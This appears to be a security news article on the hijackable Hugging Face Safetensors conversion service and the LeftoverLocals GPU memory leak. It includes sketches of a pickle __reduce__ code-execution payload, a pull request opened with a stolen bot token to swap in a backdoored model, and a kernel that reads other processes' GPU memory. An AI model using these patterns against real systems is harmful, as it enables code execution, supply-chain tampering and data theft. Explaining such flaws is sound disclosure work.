Cybersecurity researchers have found that it’s possible to compromise the Hugging Face Safetensors conversion service to hijack the models submitted by users and result in supply chain attacks.
“It’s possible to send malicious pull requests with attacker-controlled data from the Hugging Face service to any repository on the platform, as well as hijack any models that are submitted through the conversion service,” HiddenLayer said in a report published last week.
This, in turn, can be accomplished using a hijacked model that’s meant to be converted by the service, thereby allowing malicious actors to request changes to any repository on the platform by masquerading as the conversion bot.
Hugging Face is a popular collaboration platform that helps users host pre-trained machine learning models and datasets, as well as build, deploy, and train them.
Safetensors is a format the company devised to store tensors with security in mind, as opposed to pickle, a format that has likely been weaponized by threat actors to execute arbitrary code and deploy Cobalt Strike, Mythic, and Metasploit stagers.
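The underlying risk is straightforward to illustrate: pickle is a serialization format that can instruct the loader to invoke arbitrary callables during deserialization. The minimal, widely known sketch below runs a harmless `id` command upon unpickling; a real payload would drop a stager instead.

```python
import os
import pickle

# Illustrative only: __reduce__ tells pickle to call os.system("id")
# when the object is deserialized. Any callable could go here, which
# is why loading untrusted pickle files is dangerous.
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ("id",))

blob = pickle.dumps(MaliciousPayload())

# The victim merely loads the data; the command runs as a side effect
# of unpickling, with no method call required.
pickle.loads(blob)
```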
It also comes with a conversion service that enables users to convert any PyTorch model (i.e., pickle) to its Safetensors equivalent via a pull request.
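Conceptually, such a conversion boils down to deserializing the pickle-based checkpoint and re-saving its raw tensors, along the lines of the following sketch (the file names are hypothetical, and the official service wraps this logic in a bot that opens the pull request). The `torch.load` call is precisely where a booby-trapped model would execute attacker code.

```python
import torch
from safetensors.torch import save_file

# Hypothetical file names, for illustration. torch.load deserializes
# the pickle-based checkpoint -- this is the step where a malicious
# model would execute arbitrary code inside the conversion service.
state_dict = torch.load("pytorch_model.bin", map_location="cpu")

# Re-serialize the raw tensors in the Safetensors format, which stores
# only data and metadata and cannot carry executable payloads.
save_file({k: v.contiguous() for k, v in state_dict.items()},
          "model.safetensors")
```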
Analysis of this service by HiddenLayer found that it’s hypothetically possible for an attacker to hijack the hosted conversion service using a malicious PyTorch binary and compromise the system hosting it.
Furthermore, the token associated with SFConvertbot, the official bot designed to generate the pull requests, could be exfiltrated and used to send a malicious pull request to any repository on the site, leading to a scenario where a threat actor could tamper with any model and implant neural backdoors.
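To illustrate the impact of such a token theft, the sketch below uses the standard huggingface_hub client to open a pull request against an arbitrary repository; armed with the SFConvertbot token, the change would appear to come from the trusted bot. The repository name, file names, and token here are hypothetical.

```python
from huggingface_hub import CommitOperationAdd, HfApi

# Hypothetical values: a stolen bot token and an arbitrary target repo.
api = HfApi(token="hf_stolen_bot_token")

# A pull request swapping in an attacker-controlled model file would
# look like routine output from the conversion bot.
api.create_commit(
    repo_id="some-org/popular-model",
    operations=[CommitOperationAdd(
        path_in_repo="model.safetensors",
        path_or_fileobj="backdoored_model.safetensors",
    )],
    commit_message="Adding `safetensors` variant of this model",
    create_pr=True,  # open a pull request rather than pushing to main
)
```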
“An attacker could execute any arbitrary code whenever someone attempted to convert their model,” researchers Eoin Wickens and Kasimir Schulz noted. “Without any indication to the users themselves, their models could be hijacked upon conversion.”
If a user attempted to convert their own private repository, the attack could pave the way for the theft of their Hugging Face token, access to otherwise internal models and datasets, and even their poisoning.
To further complicate matters, an adversary could take advantage of the fact that any user can submit a conversion request for a public repository to hijack or alter a widely used model, potentially resulting in considerable supply chain risk.
“Despite the best intentions to protect machine learning models in the Hugging Face ecosystem, the conversion service proved vulnerable and had the potential to cause a widespread supply chain attack via the official Hugging Face service,” the researchers said.
“An attacker could penetrate the container running the service and compromise any models converted by the service.”
The development comes just over a month after Trail of Bits disclosed LeftoverLocals (CVE-2023-4969, CVSS score: 6.5), a vulnerability that allows recovery of data from general-purpose graphics processing units (GPGPUs) made by Apple, Qualcomm, AMD, and Imagination.
The memory leak flaw, which results from a failure to adequately isolate process memory, allows a local attacker to read memory from other processes, including another user’s interactive session with a Large Language Model (LLM).
“This data leak can have serious security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights,” said security researchers Tyler Sorensen and Heidy Khlaaf.
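Trail of Bits’ proof of concept relied on a “listener” kernel that reads GPU local memory without ever writing to it; on affected hardware, those reads return stale values left behind by the previous kernel, potentially another user’s LLM inference. The following is a rough sketch of that idea using pyopencl (kernel and variable names are illustrative, and leakage would only be visible on unpatched GPUs).

```python
import numpy as np
import pyopencl as cl

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)

# "Listener" kernel: it only READS workgroup-local memory. On GPUs
# affected by LeftoverLocals, local memory is not zeroed between
# kernels, so these reads surface leftover data from earlier work.
src = """
__kernel void listener(__global float *out, __local float *scratch) {
    size_t lid = get_local_id(0);
    out[get_global_id(0)] = scratch[lid];  // never written here
}
"""
prg = cl.Program(ctx, src).build()

n = 64  # a single workgroup of 64 threads, for illustration
out = np.zeros(n, dtype=np.float32)
out_buf = cl.Buffer(ctx, cl.mem_flags.WRITE_ONLY, out.nbytes)

prg.listener(queue, (n,), (n,), out_buf, cl.LocalMemory(4 * n))
cl.enqueue_copy(queue, out, out_buf)

# On a vulnerable GPU, non-zero values here are leaked memory.
print(out)
```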